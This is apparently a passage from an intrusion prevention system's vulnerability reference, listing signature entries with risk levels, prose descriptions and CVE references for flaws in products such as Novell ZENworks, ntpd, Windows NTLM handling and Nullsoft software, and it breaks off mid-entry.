About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in the PreBoot Policy Service of Novell ZENworks Configuration Management. The vulnerability is due to a boundary error in the logging functionality. Remote, unauthenticated attackers could exploit this vulnerability by sending crafted packets to the affected service. Successful exploitation would allow the attacker to execute arbitrary code on the machine running the vulnerable service with System privileges.
Situation: Generic_UDP-Novell-ZENworks-Configuration-Management-Preboot-Policy-Service-Buffer-Overflow
References:
CVE-2015-0786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0786
Back to top

Novell-ZENworks-Configuration-Management-Preboot-Service-Code-Execution

About this vulnerability: A buffer overflow vulnerability in Novell ZENworks Configuration Management
Risk: High
First detected in: sgpkg-ips-313-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Novell ZENworks Desktop/Server Management
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Novell ZENworks Configuration Management. A remote attacker can exploit this vulnerability by sending a crafted request containing an overly large data section to the target server to execute arbitrary code with the SYSTEM privileges.
Situation: Generic_CS-Novell-ZENworks-Preboot-Service-Code-Execution
References:
BID-39111
http://www.securityfocus.com/bid/39111
Back to top

Novell-ZENworks-Configuration-Management-Rtrlet-Directory-Traversal

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: High
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Directory Traversal
Description: A directory traversal vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to insufficient input validation within the ZENworks Server's Rtrlet.class. Remote unauthenticated attackers can leverage this vulnerability to upload malicious files anywhere onto the target server. Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the vulnerable system with administrative privileges.
Situation: HTTP_CS-Novell-ZENworks-Configuration-Management-Rtrlet-Directory-Traversal
References:
CVE-2015-0781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0781
OSVDB-121154
http://www.osvdb.org/121154
Back to top

Novell-ZENworks-Configuration-Management-Schedule.schedulequery-SQL-Injection

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: High
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Input Validation
Description: An SQL injection vulnerability exists in ZENworks Configuration Management. The vulnerability is due to insufficient sanitization of a request parameter in the run method of the ScheduleQuery class before using the parameter in SQL queries. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted message to a target server to execute arbitrary SQL code.
Situation: HTTP_CRL-Novell-ZENworks-Configuration-Management-Schedule.schedulequery-SQL-Injection
References:
CVE-2015-0782
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0782
Back to top

Novell-ZENworks-Configuration-Management-Session-Id-Information-Disclosure

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: High
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Malfunction
Description: An information disclosure vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to exposure of insecure functionality within Rtrlet.class. By sending crafted requests to the target server, a remote unauthenticated attacker can leverage this vulnerability to disclosure Session IDs of the logged in users which can be used to used to facilitate further attacks.
Situation: HTTP_CRL-Novell-ZENworks-Configuration-Management-Session-Id-Information-Disclosure
References:
CVE-2015-0784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0784
Back to top

Novell-ZENworks-Configuration-Management-Umaninv-Information-Disclosure

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: Moderate
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Directory Traversal
Description: There is an information disclosure vulnerability in Novel ZENworks Configuration Management. The vulnerability is due to a failure to validate the "Filename" GET parameter to the umaninv service leading to directory traversal. A remote unauthenticated attacker could exploit this vulnerability by sending crafted requests to affected service. Successful exploitation would allow the attacker to disclose contents of arbitrary files.
Situation: HTTP_CSU-Novell-ZENworks-Configuration-Management-Umaninv-Information-Disclosure
References:
CVE-2013-1084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1084
OSVDB-99198
http://www.osvdb.org/99198
Back to top

Novell-ZENworks-Configuration-Management-Uploadservlet-Directory-Traversal

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: High
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Directory Traversal
Description: A directory traversal vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to insufficient input validation within the ZENworks Server's UploadServlet. Remote unauthenticated attackers can leverage this vulnerability to upload malicious files anywhere onto the target server. Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the vulnerable system with administrative privileges.
Situation: HTTP_CRL-Novell-ZENworks-Configuration-Management-Uploadservlet-Directory-Traversal
References:
CVE-2015-0779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0779
Back to top

Novell-ZENworks-Configuration-Management-Uploadservlet-Remote-Code-Execution

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Input Validation
Description: A remote code execution vulnerability exists in Novell ZENworks Configuration Management. The vulnerability is due to insufficient input validation within the ZENworks Server's UploadServlet. Remote unauthenticated attackers can leverage this vulnerability to upload malicious files anywhere onto the target server. Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the vulnerable system with the privileges of the Administrator user. In this case, the behaviour of the target machine is dependent on the intention of the malicious code.
Situation: HTTP_CRL-Novell-ZENworks-Configuration-Management-Uploadservlet-RCE
Back to top

Novell-ZENworks-Desktop-Management-On-Linux-Tftpd-Code-Execution

About this vulnerability: A vulnerability in Novell ZENworks Desktop Management on Linux
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Novell ZENworks Desktop Management
Type: Buffer Overflow
Description: A code execution vulnerability exists in Novell ZENworks Desktop Management on Linux. Specifically, the vulnerability is due to a boundary error in the TFTPD server component which listens by default on UDP port 69. When handling UDP packets, the process copies user supplied data into a fixed size stack buffer. This would cause the buffer to overrun if overly long data is provided. Attackers may leverage this to carry out code injection and execution attacks. Remote attackers may exploit this vulnerability by sending a specially crafted request to the affected service. Successful attacks would lead to execution of arbitrary code on the target host in the context of the TFTPD process, normally root.
Situation: TFTP_CS-Novell-ZENworks-Desktop-Management-On-Linux-Tftpd-Code-Execution
References:
BID-45378
http://www.securityfocus.com/bid/45378
Back to top

Novell-ZENworks-Handheld-Management-Buffer-Overflow

About this vulnerability: A vulnerability in Novell ZENworks Handheld Management
Risk: High
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Handheld Management
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Novell ZENworks Handheld Management. The vulnerability is due to an error in the IP Conduit service while parsing the client messages with a malicious opcode and string size value. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted packet to the affected server. Successful exploitation would allow the attacker to execute arbitrary code on the server with the privileges of the service, by default SYSTEM.
Situation: Generic_CS-Novell-ZENworks-Handheld-Management-Buffer-Overflow
References:
BID-46024
http://www.securityfocus.com/bid/46024
Back to top

Novell-ZENworks-Handheld-Management-Upload-Directory-Traversal

About this vulnerability: A vulnerability in Novell ZENworks Handheld Management
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Handheld Management
Type: Directory Traversal
Description: A directory traversal vulnerability exists in Novell ZENworks Handheld Management. The vulnerability occurs during a file upload operation, which can lead to an arbitrary file upload, and later command execution.
Situation: Generic_CS-Novell-ZENworks-Handheld-Management-Upload-Directory-Traversal
References:
BID-48467
http://www.securityfocus.com/bid/48467
Back to top

Novell-ZENworks-Handheld-Management-Zfhipcnd.exe-Buffer-Overflow

About this vulnerability: A vulnerability in Novell ZENworks Handheld Management
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Novell ZENworks Handheld Management
Type: Buffer Overflow
Description: A vulnerability exists in Novell ZENworks Handheld Management that could be exploited by remote attackers to execute code on a vulnerable system. The vulnerability is due to an error in the IP Conduit service of the Novell ZENworks Handheld Management. Remote attackers could exploit this vulnerability by sending a crafted packet to the affected server. Successful exploitation would cause a heap-based buffer overflow in ZENworks Handheld Management. This could allow the attacker to execute arbitrary code on the server with system privileges.
Situation: Generic_CS-Novell-ZENworks-Handheld-Management-Zfhipcnd.exe-Buffer-Overflow
References:
CVE-2010-4299
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4299
BID-44700
http://www.securityfocus.com/bid/44700
Back to top

Novell-ZENworks-Launchhelp.dll-ActiveX-LaunchProcess-Code-Execution

About this vulnerability: A vulnerability in Novell ZENworks AdminStudio and Configuration Management
Risk: Moderate
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks AdminStudio; Novell ZENworks Configuration Management
Type: Malfunction
Description: A vulnerability exists in Novell ZENworks. Specifically, the vulnerability is due to an access control weakness in the ActiveX Control LaunchHelp.HelpLauncher when handling the LaunchProcess() method. A remote attacker can exploit the vulnerability by enticing a user to open a specially crafted web page. Successful exploitation can result in arbitrary code execution in the context of the currently logged-in user.
Situation: File-Text_Novell-ZENworks-Launchhelp.dll-ActiveX-LaunchProcess-Code-Execution
References:
CVE-2011-2657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2657
BID-50274
http://www.securityfocus.com/bid/50274
Back to top

Novell-ZENworks-Mobile-Management-Cross-Site-Scripting

About this vulnerability: A vulnerability in Novell ZENworks Mobile Management
Risk: High
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Mobile Management
Type: Input Validation
Description: There exists a cross-site scripting vulnerability in Novell ZENworks Mobile Management. A remote attacker can use the vulnerability to execute arbitrary script code.
Situation: HTTP_CRL-Novell-ZENworks-Mobile-Management-Cross-Site-Scripting
Back to top

Novell-ZENworks-Mobile-Management-Dusap.php-Code-Execution

About this vulnerability: A vulnerability in Novell ZENworks Mobile Management
Risk: High
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Mobile Management
Type: Directory Traversal
Description: A code execution vulnerability has been reported in Novell's ZENworks Mobile Management system. The vulnerability is due to insufficient validation of the language parameter while being processed by DUSAP.php. An attacker can exploit this vulnerability by using directory traversal characters as part of the language parameter to cause code execution.
Situation: HTTP_CRL-Novell-ZENworks-Mobile-Management-Dusap.php-Code-Execution
References:
CVE-2013-1082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1082
BID-60179
http://www.securityfocus.com/bid/60179
OSVDB-91118
http://www.osvdb.org/91118
Back to top

Novell-ZENworks-Mobile-Management-Mdm.php-Code-Execution

About this vulnerability: A vulnerability in Novell ZENworks Mobile Management
Risk: High
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Mobile Management
Type: Directory Traversal
Description: A code execution vulnerability has been reported in ZENworks' Mobile Management system. The vulnerability is due to insufficient validation of the language parameter while being processed by MDM.php. An attacker can exploit this vulnerability by using directory traversal characters as part of the language parameter to cause code execution.
Situation: HTTP_CRL-Novell-ZENworks-Mobile-Management-Mdm.php-Code-Execution
References:
CVE-2013-1081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1081
BID-58402
http://www.securityfocus.com/bid/58402
OSVDB-91119
http://www.osvdb.org/91119
Back to top

Novell-ZENworks-Patch-Management-Multiple-SQL-Injection-Vulnerabilities

About this vulnerability: A vulnerability in Novell ZENworks
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Patch Management
Type: Malfunction
Description: There are several user input validation vulnerabilities in the Novell ZENworks Patch Management product. After authentication, a malicious user can submit crafted HTTP request to the affected product to exploit the flaws. The attacker may inject and execute arbitrary SQL commands on the vulnerable host. The target behaviour is dependent on the nature and purpose of the injected SQL statements. The target may show no abnormal behaviour under attack.
Situation: HTTP_CSU-Novell-ZENworks-Patch-Management-Multiple-SQL-Injection-Vulnerabilities
References:
CVE-2005-3315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3315
BID-15220
http://www.securityfocus.com/bid/15220
OSVDB-20363
http://www.osvdb.org/20363
OSVDB-20362
http://www.osvdb.org/20362
Back to top

Novell-ZENworks-Pre-Authentication-Buffer-Overflow

About this vulnerability: Pre-authentication buffer overflow vulnerability in Novell ZENworks
Risk: Moderate
First detected in: sgpkg-ips-36-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Desktop/Server Management
Type: Buffer Overflow
Description: Novell ZENworks has a pre-authentication buffer overflow vulnerability. A remote attacker can exploit this vulnerability to execute arbitrary code in the context of the vulnerable service.
Situation: Generic_Novell-ZENworks-Pre-Authentication-Buffer-Overflow
References:
CVE-2005-1543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1543
BID-13678
http://www.securityfocus.com/bid/13678
Back to top

Novell-ZENworks-Preboot-Service-Opcode-4c-Buffer-Overflow

About this vulnerability: An attempt to exploit a buffer overflow vulnerability in Novell ZENworks Configuration Management detected
Risk: High
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Buffer Overflow
Description: A code execution vulnerability exists in Novell ZENworks Configuration Management 11.1 Preboot Service. Calling opcode 0x0000004c remotely, an attacker can inject the vulnerable system can exploit an insufficient boundary checking algorithm resulting to a buffer overflow. Attackers may leverage this to carry out code injection and execution attacks. Successful attacks can lead to execution of arbitrary code, resulting to a full system compromise.
Situation: Generic_CS-Novell-ZENworks-Preboot-Service-Opcode-4c-Buffer-Overflow
References:
CVE-2011-3176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3176
OSVDB-80231
http://www.osvdb.org/80231
Back to top

Novell-ZENworks-Preboot-Service-Opcode-6c-Buffer-Overflow

About this vulnerability: An attempt to exploit a buffer overflow vulnerability in Novell ZENworks Configuration Management detected
Risk: High
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Configuration Management
Type: Buffer Overflow
Description: A code execution vulnerability exists in Novell ZENworks Configuration Management 11.1 Preboot Service. Calling opcode 0x0000006c remotely, an attacker can inject the vulnerable system can exploit an insufficient boundary checking algorithm resulting to a buffer overflow. Attackers may leverage this to carry out code injection and execution attacks. Successful attacks can lead to execution of arbitrary code, resulting to a full system compromise.
Situation: Generic_CS-Novell-ZENworks-Preboot-Service-Opcode-6c-Buffer-Overflow
References:
CVE-2011-3175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3175
OSVDB-80231
http://www.osvdb.org/80231
Back to top

Novell-ZENworks-Remote-Management-Buffer-Overflow

About this vulnerability: A vulnerability in Novell ZENworks
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell ZENworks Desktop Management
Type: Input Validation
Description: There is a vulnerability in the authentication mechanism of the Novell ZENWorks suite. The flaw is caused by insufficient boundary checking of authentication data. This vulnerability can be remotely exploited without credentials to execute arbitrary code on the target system within the system/root context. In a simple attack case aimed at creating a denial of service condition, the affected service will terminate. If the service is not configured to restart automatically, then the Novell ZfD Remote Management functionality will be unavailable until the server is restarted manually. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, normally System level.
Situation: Generic_CS-Novell-ZENworks-Remote-Management-Buffer-Overflow
References:
CVE-2005-1543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1543
BID-13678
http://www.securityfocus.com/bid/13678
Back to top

NOVUS-NConfig-SEH-Buffer-Overflow

About this vulnerability: NOVUS NConfig SEH based buffer overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NOVUS
Type: Buffer Overflow
Description: An exception handler based buffer overflow vulnerability in NOVUS NConfig which can result in remote code execution.
Situation: Generic_SS-NOVUS-NConfig-SEH-Buffer-Overflow
Back to top

Now-SMS/MMS-Gateway-Buffer-Overflow

About this vulnerability: Now SMS/MMS Gateway 2007.06.27 And Earlier Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1589-5242
Platform: Windows
Software: Now SMS/MMS Gateway
Type: Buffer Overflow
Description: A multiple stack based buffer overflow vulnerability in Now SMS/MMS Gateway 2007.06.27 And Earlier which allows attackers to remotly execute arbitrary code via a long password in an authorization header to the HTTP service, a large packet to the SMPP service.
References:
CVE-2008-0871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0871
BID-27896
http://www.securityfocus.com/bid/27896
OSVDB-42953
http://www.osvdb.org/42953
Back to top

NSClient++-ExternalScripts-Authenticated-RCE

About this vulnerability: A vulnerability in NSClient++.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Windows
Software: NSClient++
Type: Insecure Configuration
Description: A vulnerability in the NSClient++ module which allows remote attackers to start a privileged shell due to an insecure configuration.
Situation: HTTP_CRL-NSClient++-ExternalScripts-Authenticated-RCE
Back to top

NSEC3-Invalid-Response-Heap-Corruption

About this vulnerability: A vulnerability in Windows 8 to Windows 10
Risk: Moderate
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: The Salt Length and Hash Length fields in DNS NSEC3 records are not checked against attacker controller buffer lengths allocated by the Windows DNS resolver code. Successful exploitation may lead to unauthenticated remote code execution and system compromise.
Situation: DNS-UDP_NSEC3-Invalid-Field-Length
References:
CVE-2017-11779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11779
ms17-oct
http://technet.microsoft.com/security/bulletin/ms17-oct
Back to top

NTLM-Credentials-Exposure

About this vulnerability: A PDF file with possible NTLM credential exposure functionality detected
Risk: Low
First detected in: sgpkg-ips-1068-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: There has been reported a vulnerability in PDF viewer applications, which could leak NTLM credentials from Windows operation system.
Situation: File-PDF_NTLM-Credentials-Exposure
References:
CVE-2018-4993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4993
Back to top

NTLM-Credentials-Leak-Via-Internet-Shortcut-CVE-2023-32046

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1609-5242
Last changed: sgpkg-ips-1609-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Windows has a special URL file type that is used to create shortcuts to webpages. When Windows Explorer encounters such a file, it will automatically parse it to see if there is an icon associated to the shortcut. Setting the icon to an UNC path will cause Windows Explorer to try and load it, and thus, leaking NTLM credentials. Thus, if an attacker manages to drop a URL file in a user's folder, the user's NTLM credential is leaked every time the user views the folder in Explorer.
Situation: File-Text_NTLM-Credential-Leak-Via-Internet-Shortcut-CVE-2023-32046
File-TextId_NTLM-Credential-Leak-Via-Internet-Shortcut-CVE-2023-32046
References:
CVE-2023-32046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32046
ms23-jul
http://technet.microsoft.com/security/bulletin/ms23-jul
Back to top

NTLM-Hash-Disclosure-CVE-2024-43451

About this vulnerability: An attempt to exploit a vulnerability in Windows detected
Risk: High
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: NTLM hash disclosure vulnerability.
Situation: File-Text_NTLM-Hash-Disclosure-CVE-2024-43451
File-TextId_NTLM-Hash-Disclosure-CVE-2024-43451
References:
CVE-2024-43451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43451
ms24-nov
http://technet.microsoft.com/security/bulletin/ms24-nov
Back to top

Ntopng-Authentication-Bypass-CVE-2021-28073

About this vulnerability: A vulnerability in ntopng
Risk: High
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Platform: Generic
Software: ntopng
Type: Directory Traversal
Description: An authentication bypass vulnerability exists in ntopng versions up to and including 4.2. A successful exploit allows unauthorized access to sensitive information.
Situation: HTTP_CSU-Ntopng-Authentication-Bypass-CVE-2021-28073
References:
CVE-2021-28073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28073
Back to top

Ntp-Daemon-Autokey-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in the Network Time Protocol daemon
Risk: High
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Network Time Protocol daemon (ntpd). The flaw is due to a boundary error when processing crafted packets sent to the daemon. A successful exploitation of the vulnerability may lead to code execution in the context of the daemon process.
Situation: NTP_UDP-Ntp-Daemon-Autokey-Stack-Buffer-Overflow
References:
CVE-2009-1252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252
BID-35017
http://www.securityfocus.com/bid/35017
Back to top

Ntp-Daemon-Readvar-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in the Network Time Protocol daemon
Risk: High
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Network Time Protocol daemon (ntpd). The flaw is due to a boundary error when processing crafted packets sent to the daemon. A successful exploitation of the vulnerability may lead to code execution in the context of the daemon process.
Situation: NTP_UDP-Ntp-Daemon-Readvar-Stack-Buffer-Overflow
References:
CVE-2001-0414
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0414
BID-2540
http://www.securityfocus.com/bid/2540
OSVDB-805
http://www.osvdb.org/805
Back to top

Ntp-Mode-7-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in the Network Time Protocol (NTP) daemon
Risk: High
First detected in: sgpkg-ips-273-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: ntpd
Type: Malfunction
Description: There is a denial of service vulnerability in the Network Time Protocol (NTP) daemon. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted mode 7 request to the target NTP server.
Situation: Analyzer_NTP-Mode-7-Denial-Of-Service
NTP_UDP-Ntp-Mode-7-Denial-Of-Service-Exploit
References:
CVE-2009-3563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563
BID-37255
http://www.securityfocus.com/bid/37255
OSVDB-60847
http://www.osvdb.org/60847
Back to top

Ntp-Monlist-Denial-Of-Service

About this vulnerability: Deprecated NTP REQ_MON_GETLIST or REQ_MON_GETLIST_1 control instruction may be used in a DoS
Risk: Moderate
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Misconfiguration
Description: Forged NTP REQ_MON_GETLIST and REQ_MON_GETLIST_1 control instructions can be used to make an NTP server DoS a victim computer. These commands have been deprecated since NTP version 4.2.7.
Situation: NTP_UDP-Ntp-Monlist-Command
References:
CVE-2013-5211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211
Back to top

Ntp.org-Network-Time-Protocol-Windows-Daemon-Getendptfromioctx-Denial-Of-Service

About this vulnerability: A vulnerability in ntp.org NTP
Risk: Moderate
First detected in: sgpkg-ips-835-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Malfunction
Description: Improper processing of large packets results in a vulnerability in ntp.org ntpd. A successful exploitation will cause a denial of service condition.
Situation: NTP_UDP-Ntp.org-Network-Time-Protocol-Windows-Daemon-Getendptfromioctx-Denial-Of-Service
References:
CVE-2016-9312
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9312
Back to top

NTPsec-ntpd-Process-Control-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in NTPsec ntpd
Risk: Moderate
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Input Validation
Description: A vulnerability in NTPsec ntpd, versions prior to 1.1.3, which could result in information disclosure due to the insufficient validation of the address of a field to be read in an ntp packet.
Situation: NTP_UDP-NTPsec-ntpd-Process-Control-Out-Of-Bounds-Read
References:
CVE-2019-6444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6444
Back to top

NTPsec-ntpd-Write-Variables-DoS

About this vulnerability: A vulnerability in NTPsec ntpd
Risk: High
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ntpd
Type: Input Validation
Description: A vulnerability in NTPsec ntpd, versions prior to 1.1.3, which allows remote attackers to cause a denial of service condition by sending a crafted packet, due to insufficient validation of the message.
Situation: NTP_UDP-NTPsec-ntpd-Write-Variables-DoS
References:
CVE-2019-6445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6445
Back to top

NTR-ActiveX-Control-Check-Buffer-Overflow

About this vulnerability: An NTR ActiveX Control Check Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: NTRglobal
Type: Buffer Overflow
Description: A buffer overflow vulnerability in the Check method in NTRglobal ActiveX control, versions before 2.0.4.8, which allows remote attackers to execute arbitrary code.
Situation: File-Text_NTR-ActiveX-Control-Check-Buffer-Overflow
References:
CVE-2012-0266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0266
BID-51374
http://www.securityfocus.com/bid/51374
OSVDB-78252
http://www.osvdb.org/78252
Back to top

NTR-ActiveX-StopModule-Code-Execution

About this vulnerability: An NTR ActiveX StopModule Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista
Software: NTRglobal
Type: Configuration Error
Description: A vulnerability in the StopModule method in the NTRglobal ActiveX control, versions before 2.0.4.8, which allows remote attackers to execute arbitrary code via a crafted iModule parameter.
Situation: File-Text_NTR-ActiveX-StopModule-Code-Execution
References:
CVE-2012-0267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0267
BID-51374
http://www.securityfocus.com/bid/51374
OSVDB-78253
http://www.osvdb.org/78253
Back to top

Nucrypt

About this vulnerability: Nucrypt
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Nucrypt is a Botnet responsible for sending spam.
Situation: HTTP_CSU-Nucrypt-Activity
Back to top

NuggetPhantom-Infection-Traffic

About this vulnerability: NuggetPhantom infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: NuggetPhantom infection traffic was detected.
Situation: HTTP_CSU-NuggetPhantom-Infection-Traffic
Back to top

Nullsoft-Scriptable-Installation-System-Download-Plugin

About this vulnerability: Nullsoft Scriptable Installation System arbitary file download
Risk: Low
First detected in: sgpkg-ips-146-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Nullsoft Scriptable Installation System
Type: Insecure Configuration
Description: Nullsoft Scriptable Installation System (NSIS) is a framework used to create software installation packages. It contains various plugins and extensions, including a plug in that allows download of arbitrary files from a remote server.
Situation: HTTP_CSH-Nullsoft-Scriptable-Installation-System-Download-Plugin
Back to top

Nullsoft-SHOUTcast-Server-Log-Cross-Site-Scripting

About this vulnerability: A vulnerability in Nullcast Shoutcast Server
Risk: Low
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-1589-5242
Platform: Windows
Software: SHOUTcast Server
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in Nullsoft SHOUTcast Server. The vulnerability is due to insufficient input validation before writing to the request log file. Successful exploitation may allow information forgery and code execution in the context of the administration interface of the SHOUTcast Server.
Situation: HTTP_CS-Nullsoft-SHOUTcast-Server-Log-Cross-Site-Scripting
References:
CVE-2007-1229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1229
BID-22742
http://www.securityfocus.com/bid/22742
OSVDB-33793
http://www.osvdb.org/33793
Back to top

Nullsoft-Winamp-Advanced-Module-Format-File-Buffer-Overflow

About this vulnerability: A vulnerability in NullSoft WinAmp
Risk: Moderate
First detected in: sgpkg-ips-422-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Winamp
Type: Buffer Overflow
Description: There is a code execution vulnerability in Nullsoft Winamp. This vulnerability is due to a heap buffer overflow while handling crafted .amf files. Remote attackers can exploit this vulnerability by enticing the target user to open specially crafted files. Successful exploitation would lead to to arbitrary code execution in the security context of the logged-in user.
Situation: File-Binary_Nullsoft-Winamp-Advanced-Module-Format-File-Buffer-Overflow
References:
